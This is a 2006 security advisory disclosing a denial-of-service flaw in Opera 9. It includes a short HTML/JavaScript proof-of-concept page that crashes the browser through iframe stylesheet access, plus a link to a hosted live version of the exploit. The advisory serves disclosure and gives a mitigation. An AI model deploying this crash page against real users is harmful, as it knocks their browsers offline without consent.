ECHO_ADV_35$2006 ------------------------------------------------------------------------------------ [ECHO_ADV_35$2006] OPERA Web Browser 9 Denial OF Service ------------------------------------------------------------------------------------ Author : Ahmad Muammar W.K (a.k.a) y3dips Date Found : July, 1th 2006 Location : Indonesia, Jakarta web : http://echo.or.id/adv/adv35-y3dips-2006.txt Critical Lvl : Moderated Impact : Browser will automatically shutdown Where : From Remote ------------------------------------------------------------------------------------ Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Opera Web Browser Application : Opera Web Browser version : Opera/9.00 (X11; Linux i686; U; en) Opera/9.00 (Windows NT 5:1;U;en) Some Other version are bot vulnerable and others are not tested, URL : http://opera.com Description : Vulnerability can be exploited by using <iframe> combining with javascript (documents stylesheet) to create an out-of-bounds memory access. ------------------------------------------------------------------------------------ Exploit Code: ~~~~~~~~~~~~~~~~ -----------------------opera9xploit.html---------------------- <!-- Opera 9 DOS exploit, discovered by Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id) http://y3d1ps.blogspot.com //--> <html> <iframe src="palsu.php" name="fake" ></iframe> <script type="text/javascript"> function mystyle() { if (fake.document.styleSheets.length == 1 ) { f = document.forms["basicstyle"].elements; for (j = 0; j < f.length; j++) { if (f[j].name == 'fsmain'); } } } mystyle(); </script> </html> live exploit : http://y3dips.echo.or.id/opera9-dos/ ------------------------------------------------------------------------------------ Solution: ~~~~~~~~ Disable Java Scipt execution from Opera Web browser ------------------------------------------------------------------------------------ Shoutz: ~~~~~~~ ~ my beloved ana ~ the_day, K-159 (keep researching), also all echo staff ~ negative , naisenodni crew ~ janex vind "waraxe" @ waraxe.us ~ newbie_hacker[at]yahoogroups.com ~ #e-c-h-o @irc.dal.net ------------------------------------------------------------------------------------ Contact: ~~~~~~~~ y3dips || echo|staff || y3dips[at]echo[dot]or[dot]id Homepage: http://y3dips.echo.or.id/ -------------------------------- [ EOF ] -------------------------------------------
